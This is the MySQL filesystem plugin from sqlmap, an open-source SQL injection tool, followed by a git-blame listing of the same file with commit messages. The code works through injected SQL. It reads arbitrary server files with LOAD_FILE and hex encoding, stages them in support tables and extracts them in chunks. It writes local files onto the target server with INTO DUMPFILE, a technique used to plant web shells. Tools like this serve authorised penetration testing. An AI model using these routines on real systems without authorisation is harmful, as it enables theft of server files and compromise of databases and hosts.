sqlmap/plugins/dbms/mysql/filesystem.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomStr
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import SqlmapNoneDataException
from lib.request import inject
from lib.techniques.union.use import unionUse
from plugins.generic.filesystem import Filesystem as GenericFilesystem

class Filesystem(GenericFilesystem):
    def __init__(self):
        GenericFilesystem.__init__(self)

    def nonStackedReadFile(self, rFile):
        infoMsg = "fetching file: '%s'" % rFile
        logger.info(infoMsg)

        result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    def stackedReadFile(self, rFile):
        infoMsg = "fetching file: '%s'" % rFile
        logger.info(infoMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
        self.getRemoteTempPath()

        tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))

        debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile
        debugMsg += "into temporary file '%s'" % tmpFile
        logger.debug(debugMsg)
        inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))

        debugMsg = "loading the content of hexadecimal encoded file "
        debugMsg += "'%s' into support table" % rFile
        logger.debug(debugMsg)
        inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))

        length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)

        if not isNumPosStrValue(length):
            warnMsg = "unable to retrieve the content of the "
            warnMsg += "file '%s'" % rFile

            if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                warnMsg += ", going to fall-back to simpler UNION technique"
                logger.warn(warnMsg)
                result = self.nonStackedReadFile(rFile)
            else:
                raise SqlmapNoneDataException(warnMsg)
        else:
            length = int(length)
            sustrLen = 1024

            if length > sustrLen:
                result = []

                for i in xrange(1, length, sustrLen):
                    chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)

                    result.append(chunk)
            else:
                result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)

        return result

    def unionWriteFile(self, wFile, dFile, fileType):
        logger.debug("encoding file to its hexadecimal string value")

        fcEncodedList = self.fileEncode(wFile, "hex", True)
        fcEncodedStr = fcEncodedList[0]
        fcEncodedStrLen = len(fcEncodedStr)

        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
            warnMsg = "the injection is on a GET parameter and the file "
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
            warnMsg += "bytes, this might cause errors in the file "
            warnMsg += "writing process"
            logger.warn(warnMsg)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
        unionUse(sqlQuery, unpack=False)

        warnMsg = "expect junk characters inside the "
        warnMsg += "file as a leftover from UNION query"
        singleTimeWarnMessage(warnMsg)

    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
        debugMsg = "creating a support table to write the hexadecimal "
        debugMsg += "encoded file to"
        logger.debug(debugMsg)

        self.createSupportTbl(self.fileTblName, self.tblField, "longblob")

        logger.debug("encoding file to its hexadecimal string value")
        fcEncodedList = self.fileEncode(wFile, "hex", False)

        debugMsg = "forging SQL statements to write the hexadecimal "
        debugMsg += "encoded file to the support table"
        logger.debug(debugMsg)

        sqlQueries = self.fileToSqlQueries(fcEncodedList)

        logger.debug("inserting the hexadecimal encoded file to the support table")

        for sqlQuery in sqlQueries:
            inject.goStacked(sqlQuery)

        debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
        inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)

        return self.askCheckWrittenFile(wFile, dFile, forceCheck)
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`#!/usr/bin/env python`

			`"""`
updated copyright 2013-01-18 18:07:51 +04:00			`Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`"""`

minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import isNumPosStrValue`
minor bug fix 2012-05-18 12:51:50 +04:00			`from lib.core.common import isTechniqueAvailable`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.common import randomStr`
minor fix 2011-09-21 02:16:56 +04:00			`from lib.core.common import singleTimeWarnMessage`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
code refactoring regarding charsetType inside inference/bisection 2012-02-29 18:36:23 +04:00			`from lib.core.enums import CHARSET_TYPE`
few fixes related to bug report by Shadow Folder (AttributeError: 'list' object has no attribute 'isdigit') 2012-04-04 13:25:05 +04:00			`from lib.core.enums import EXPECTED`
minor fix 2012-05-24 22:05:33 +04:00			`from lib.core.enums import PAYLOAD`
further refactoring (all enumerations are now put into enums.py) 2010-11-08 12:20:02 +03:00			`from lib.core.enums import PLACE`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`from lib.core.exception import SqlmapNoneDataException`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from lib.request import inject`
Moved folder 2011-06-18 16:34:41 +04:00			`from lib.techniques.union.use import unionUse`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`from plugins.generic.filesystem import Filesystem as GenericFilesystem`

			`class Filesystem(GenericFilesystem):`
			`def __init__(self):`
			`GenericFilesystem.__init__(self)`

proper naming 2012-07-06 18:13:50 +04:00			`def nonStackedReadFile(self, rFile):`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`infoMsg = "fetching file: '%s'" % rFile`
			`logger.info(infoMsg)`

Some work on Issue #68 2012-07-11 13:58:47 +04:00			`result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

			`def stackedReadFile(self, rFile):`
			`infoMsg = "fetching file: '%s'" % rFile`
			`logger.info(infoMsg)`

			`self.createSupportTbl(self.fileTblName, self.tblField, "longtext")`
			`self.getRemoteTempPath()`

			`tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "into temporary file '%s'" % tmpFile`
			`logger.debug(debugMsg)`
			`inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "loading the content of hexadecimal encoded file "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "'%s' into support table" % rFile`
			`logger.debug(debugMsg)`
			`inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))`

few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor fix 2011-09-21 02:16:56 +04:00			`if not isNumPosStrValue(length):`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`warnMsg = "unable to retrieve the content of the "`
			`warnMsg += "file '%s'" % rFile`

			`if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):`
I am back on stage and here to stay!!! to start.. a removal of confirm switch which masked cases where file write operations failed when set to False automatically, now at least it asks the user and defaults to Yes 2012-07-02 02:25:05 +04:00			`warnMsg += ", going to fall-back to simpler UNION technique"`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`logger.warn(warnMsg)`
proper naming 2012-07-06 18:13:50 +04:00			`result = self.nonStackedReadFile(rFile)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
Replacing old and deprecated raise Exception style (PEP8) 2013-01-04 02:20:55 +04:00			`raise SqlmapNoneDataException(warnMsg)`
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`else:`
			`length = int(length)`
			`sustrLen = 1024`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`if length > sustrLen:`
			`result = []`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`for i in xrange(1, length, sustrLen):`
few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
Falling back to unionReadFile() when --file-read does not work against MySQL. This happens when the session user does not have INSERT privilege, required to run LOAD DATA INFILE 2012-04-19 18:05:45 +04:00			`result.append(chunk)`
			`else:`
few just in case fixes (unarrayizeValue in dumpTable entries) and and some refactoring (unique is now not done for every union case but only if detected that there are duplicates in union test) 2012-06-16 00:41:53 +04:00			`result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
			`return result`

I am back on stage and here to stay!!! to start.. a removal of confirm switch which masked cases where file write operations failed when set to False automatically, now at least it asks the user and defaults to Yes 2012-07-02 02:25:05 +04:00			`def unionWriteFile(self, wFile, dFile, fileType):`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`logger.debug("encoding file to its hexadecimal string value")`

Minor code restyling 2011-04-30 17:20:05 +04:00			`fcEncodedList = self.fileEncode(wFile, "hex", True)`
			`fcEncodedStr = fcEncodedList[0]`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`fcEncodedStrLen = len(fcEncodedStr)`

Rewrite from scratch the detection engine. Now it performs checks defined in payload.xml. User can specify its own. All (hopefully) functionalities should still be working. Added two switches, --level and --risk to specify which injection tests and boundaries to use. The main advantage now is that sqlmap is able to identify initially which injection types are present so for instance if boolean-based blind is not supported, but error-based is, sqlmap will keep going and work! 2010-11-28 21:10:54 +03:00			`if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:`
Minor code restyling 2011-04-30 17:20:05 +04:00			`warnMsg = "the injection is on a GET parameter and the file "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen`
			`warnMsg += "bytes, this might cause errors in the file "`
			`warnMsg += "writing process"`
			`logger.warn(warnMsg)`

			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)`
			`logger.debug(debugMsg)`

			`sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)`
Minor bug fix so that --file-write on MySQL via UNION query now works again 2011-02-12 02:35:45 +03:00			`unionUse(sqlQuery, unpack=False)`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00
minor update 2011-06-07 19:13:51 +04:00			`warnMsg = "expect junk characters inside the "`
			`warnMsg += "file as a leftover from UNION query"`
more concise 2011-06-08 18:35:23 +04:00			`singleTimeWarnMessage(warnMsg)`
minor update 2011-06-07 19:13:51 +04:00
fixes #187 2013-01-23 05:27:01 +04:00			`def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):`
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "creating a support table to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to"`
			`logger.debug(debugMsg)`

			`self.createSupportTbl(self.fileTblName, self.tblField, "longblob")`

			`logger.debug("encoding file to its hexadecimal string value")`
			`fcEncodedList = self.fileEncode(wFile, "hex", False)`

Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "forging SQL statements to write the hexadecimal "`
Major code refactoring: moved and split plugins (mysql, pgsql, mssql, oracle) more granularly and organized. Todo for firebird, sqlite, access. 2010-03-23 01:57:57 +03:00			`debugMsg += "encoded file to the support table"`
			`logger.debug(debugMsg)`

			`sqlQueries = self.fileToSqlQueries(fcEncodedList)`

			`logger.debug("inserting the hexadecimal encoded file to the support table")`

			`for sqlQuery in sqlQueries:`
			`inject.goStacked(sqlQuery)`

			`debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)`
			`logger.debug(debugMsg)`

			`# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html`
			`inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)`

fixes #187 2013-01-23 05:27:01 +04:00			`return self.askCheckWrittenFile(wFile, dFile, forceCheck)`